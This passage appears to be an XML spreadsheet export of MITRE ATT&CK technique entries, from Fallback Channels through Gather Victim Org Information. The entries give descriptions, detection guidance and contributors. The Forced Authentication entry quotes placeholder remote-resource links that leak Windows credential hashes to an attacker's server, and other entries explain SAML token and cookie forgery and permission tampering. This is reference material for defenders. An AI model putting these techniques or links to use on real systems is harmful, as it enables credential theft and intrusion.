    <t>Application Log: Application Log Content, Logon Session: Logon Session Metadata, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; Ariel Shuper, Cisco; Brad Geesaman, @bradgeesaman; Daniel Oakley; David Fiser, @anu4is, Trend Micro; ExtraHop; Idan Frimark, Cisco; Jay Chen, Palo Alto Networks; Magno Logan, @magnologan, Trend Micro; Rory McCune, Aqua Security; Travis Smith, Tripwire; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team; Yuval Avrahami, Palo Alto Networks</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1008</t>
  </si>
  <si>
    <t>T1083</t>
  </si>
  <si>
    <t>File and Directory Discovery</t>
  </si>
  <si>
    <t>Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Many command shell utilities can be used to obtain this information. Examples include &lt;code&gt;dir&lt;/code&gt;, &lt;code&gt;tree&lt;/code&gt;, &lt;code&gt;ls&lt;/code&gt;, &lt;code&gt;find&lt;/code&gt;, and &lt;code&gt;locate&lt;/code&gt;. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1083</t>
  </si>
  <si>
    <t>System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration,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</si>
  <si>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T1222</t>
  </si>
  <si>
    <t>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</si>
  <si>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Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1222</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</si>
  <si>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</si>
  <si>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Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>CrowdStrike Falcon OverWatch; Jan Miller, CrowdStrike</t>
  </si>
  <si>
    <t>File system access controls</t>
  </si>
  <si>
    <t>T1222.002</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification: Linux and Mac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</si>
  <si>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Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: &lt;code&gt;chown&lt;/code&gt; (short for change owner), and &lt;code&gt;chmod&lt;/code&gt; (short for change mode).
Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1222/002</t>
  </si>
  <si>
    <t>04 February 2020</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify 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t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>T1222.001</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification: Windows File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)
Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1222/001</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)</t>
  </si>
  <si>
    <t>T1495</t>
  </si>
  <si>
    <t>Firmware Corruption</t>
  </si>
  <si>
    <t>Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1495</t>
  </si>
  <si>
    <t>12 April 2019</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.</t>
  </si>
  <si>
    <t>Firmware: Firmware Modification</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>Forced Authentication</t>
  </si>
  <si>
    <t>Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.
Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)
Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)
There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:
* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to &lt;code&gt;file[:]//[remote address]/Normal.dotm&lt;/code&gt; to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)
* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as &lt;code&gt;\\[remote address]\pic.png&lt;/code&gt; that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1187</t>
  </si>
  <si>
    <t>Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.
Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)</t>
  </si>
  <si>
    <t>File: File Access, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Sudhanshu Chauhan, @Sudhanshu_C; Teodor Cimpoesu</t>
  </si>
  <si>
    <t>T1606</t>
  </si>
  <si>
    <t>Forge Web Credentials</t>
  </si>
  <si>
    <t>Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.
Adversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator)
Once forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1606</t>
  </si>
  <si>
    <t>17 December 2020</t>
  </si>
  <si>
    <t>Monitor for anomalous authentication activity, such as logons or other user session activity associated with unknown accounts. Monitor for unexpected and abnormal access to resources, including access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Web Credential: Web Credential Creation, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>T1606.002</t>
  </si>
  <si>
    <t>Forge Web Credentials: SAML Tokens</t>
  </si>
  <si>
    <t>An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the &lt;code&gt;NotOnOrAfter&lt;/code&gt; value of the &lt;code&gt;conditions ...&lt;/code&gt; element in a token. This value can be changed using the &lt;code&gt;AccessTokenLifetime&lt;/code&gt; in a &lt;code&gt;LifetimeTokenPolicy&lt;/code&gt;.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1606/002</t>
  </si>
  <si>
    <t>This technique may be difficult to detect as SAML tokens are signed by a trusted certificate. The forging process may not be detectable since it is likely to happen outside of a defender's visibility, but subsequent usage of the forged token may be seen. Monitor for anomalous logins using SAML tokens created by a compromised or adversary generated token-signing certificate. These logins may occur on any on-premises resources as well as from any cloud environment that trusts the certificate.(Citation: Microsoft SolarWinds Customer Guidance) Search for logins to service providers using SAML SSO which do not have corresponding 4769, 1200, and 1202 events in the Domain.(Citation: Sygnia Golden SAML)
Consider modifying SAML responses to include custom elements for each service provider. Monitor these custom elements in service provider access logs to detect any anomalous requests.(Citation: Sygnia Golden SAML)</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, Office 365, SaaS, Windows</t>
  </si>
  <si>
    <t>Blake Strom, Microsoft 365 Defender; Oleg Kolesnikov, Securonix</t>
  </si>
  <si>
    <t>T1606.001</t>
  </si>
  <si>
    <t>Forge Web Credentials: Web Cookies</t>
  </si>
  <si>
    <t>Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.
Adversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.
Once forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1606/001</t>
  </si>
  <si>
    <t>T1592</t>
  </si>
  <si>
    <t>Gather Victim Host Information</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).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</si>
  <si>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t>
  </si>
  <si>
    <t>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</si>
  <si>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T1592.004</t>
  </si>
  <si>
    <t>Gather Victim Host Information: Client Configurations</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.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client configurations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[External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592/004</t>
  </si>
  <si>
    <t>T1592.003</t>
  </si>
  <si>
    <t>Gather Victim Host Information: Firmware</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel)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[Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592/003</t>
  </si>
  <si>
    <t>T1592.001</t>
  </si>
  <si>
    <t>Gather Victim Host Information: Hardware</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure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initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592/001</t>
  </si>
  <si>
    <t>T1592.002</t>
  </si>
  <si>
    <t>Gather Victim Host Information: Software</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592/002</t>
  </si>
  <si>
    <t>T1589</t>
  </si>
  <si>
    <t>Gather Victim Identity Information</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks)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</si>
  <si>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t>
  </si>
  <si>
    <t>T1589.001</t>
  </si>
  <si>
    <t>Gather Victim Identity Information: Credentials</t>
  </si>
  <si>
    <t>Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.
Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets.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[External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1589/001</t>
  </si>
  <si>
    <t>Lee Christensen, SpecterOps; Toby Kohlenberg; Vinayak Wadhwa, Lucideus</t>
  </si>
  <si>
    <t>T1589.002</t>
  </si>
  <si>
    <t>Gather Victim Identity Information: Email Addresses</t>
  </si>
  <si>
    <t>Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.
Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1589/002</t>
  </si>
  <si>
    <t>T1589.003</t>
  </si>
  <si>
    <t>Gather Victim Identity Information: Employee Names</t>
  </si>
  <si>
    <t>Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1589/003</t>
  </si>
  <si>
    <t>T1590</t>
  </si>
  <si>
    <t>Gather Victim Network Information</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks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</si>
  <si>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t>
  </si>
  <si>
    <t>T1590.002</t>
  </si>
  <si>
    <t>Gather Victim Network Information: DNS</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)),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</si>
  <si>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https://attack.mitre.org/techniques/T1590/002</t>
  </si>
  <si>
    <t>T1590.001</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Domain Properties</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/001</t>
  </si>
  <si>
    <t>T1590.005</t>
  </si>
  <si>
    <t>Gather Victim Network Information: IP Addresses</t>
  </si>
  <si>
    <t>Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)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</si>
  <si>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https://attack.mitre.org/techniques/T1590/005</t>
  </si>
  <si>
    <t>T1590.006</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Network Security Appliances</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/006</t>
  </si>
  <si>
    <t>T1590.004</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Network Topology</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/004</t>
  </si>
  <si>
    <t>T1590.003</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Network Trust Dependencies</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information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[Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/003</t>
  </si>
  <si>
    <t>T1591</t>
  </si>
  <si>
    <t>Gather Victim Org Information</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: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 or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591</t>
  </si>
  <si>
    <t>T1591.002</t>
  </si>
  <si>
    <t>Gather Victim Org Information: Business Relationships</t>
  </si>
  <si>
